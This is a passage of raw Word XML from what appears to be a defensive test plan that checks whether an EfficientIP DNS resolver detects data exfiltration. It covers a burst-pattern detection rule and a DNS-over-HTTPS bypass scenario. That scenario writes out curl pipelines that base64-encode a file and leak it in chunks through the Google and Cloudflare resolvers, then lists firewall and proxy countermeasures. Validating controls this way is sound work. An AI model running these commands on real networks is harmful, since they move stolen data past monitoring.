        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="33C6777F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="6417A8B9" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="255D25B2" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="017BDBB5" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Burst-pause correlation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="07A87185" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Detect repeated burst patterns to same domain: &gt;3 queries within 10s followed by silence &gt;30s, repeated 3+ times → ALERT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7AB0A964" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="665F644D" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>7. Phase 4 — Advanced Tooling &amp; Tunnelling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7497CB4A" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>These scenarios require additional tools or fundamentally different techniques. They represent the most sophisticated DNS-based threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5ED69B" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="175BFAE9" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t>7.1 Scenario 10: DNS-over-HTTPS (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t>DoH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t>) Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB58733"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B2212" w14:paraId="24AE22A9" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="55107F1A" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Attribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="74E8DE89" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="3FB65AD9" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="47746EA8" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Threat Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="58C604E3" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="7B4F7E3C" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="51C7FD44" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="004BE9A8" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Base64</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="436ECA83" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="33AACA72" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3A254903" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTPS to public </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DoH</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> resolvers (bypasses port 53 entirely)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="2400412D" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="0C5BD5F1" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="3A2B2391" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Invisible to any tool that only monitors DNS protocol traffic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="38D12A79" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B57369A" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How DNS Works in This Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD69932" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>DNS-over-HTTPS (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DoH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) wraps DNS queries inside HTTPS requests to public resolvers like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>dns.google</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> or cloudflare-dns.com. Because the traffic is HTTPS on port 443, it looks like normal web browsing to network monitoring tools. The DNS query never touches </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Eff</w:t>
      </w:r>
      <w:r>
        <w:t>icientIP's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> resolver. The exfiltrated data still travels as the subdomain label, but it is now inside an encrypted HTTPS request to Google or Cloudflare, who then resolve it and forward the query to the attacker's authoritative server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BFF88B" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39AEBD32" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Step-by-Step Command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9CF2B0" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43174DBD" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Google </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DoH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700E129D"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base64 | tr -d '\n' | fold -w 40 | \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66ED11C3"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2FCF4214"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curl -s "https://dns.google/resolve?name=\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D26C3BF"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${chunk</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>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&amp;type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=A" &gt; /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13303EFF"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5-15 -n 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CED707D"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7C01398F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="560A0E18" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cloudflare </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DoH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACBA554" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cat exfil_test.txt | base64 | tr -d '\n' | fold -w 40 | \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519275F6"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7AC42E2A"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curl -s -H "Accept: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-json" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532BEC41"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"https://cloudflare-dns.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>dns-query?name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57136223"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${chunk</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>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COLLAB</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&amp;type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=A" &gt; /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA8C178"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5-15 -n 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E12C985"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61C9E49B" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="195400BA" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>What to Expect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46ACA10F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="0" w:color="C0392B"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8D7DA"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>⛔</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t xml:space="preserve"> IMPORTANT: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EfficientIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will NOT see these queries. They bypass its resolver entirely. This is expected. The purpose of this scenario is to document the gap an</w:t>
      </w:r>
      <w:r>
        <w:t>d ensure compensating controls exist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AB8CD8" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B4736DA" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Compensating Controls Required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361010C1" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Firewall rule: Block outbound HTTPS to known </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DoH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> providers (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>dns.google</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>, cloudflare-dns.com, 1.1.1.1, 8.8.8.8 on port 443, 9.9.9.9, dns.quad9.net)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215F8180" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Web proxy rule: Block </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DoH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-specific</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL paths (/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-query, /resolve) on any destination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F7C69E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t>Endpoint detection: Flag curl/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/PowerShell requests to known </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DoH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278B814D" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Document this as a finding: DNS exfil via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DoH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> bypasses </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EfficientIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> — requires complementary firewall and proxy controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEC4203" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAD3B2A" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>7.2 Scenario 11: Domain Rotation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC39E70"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B2212" w14:paraId="4470E412" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="2EA202E9" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Attribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="18565E6B" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
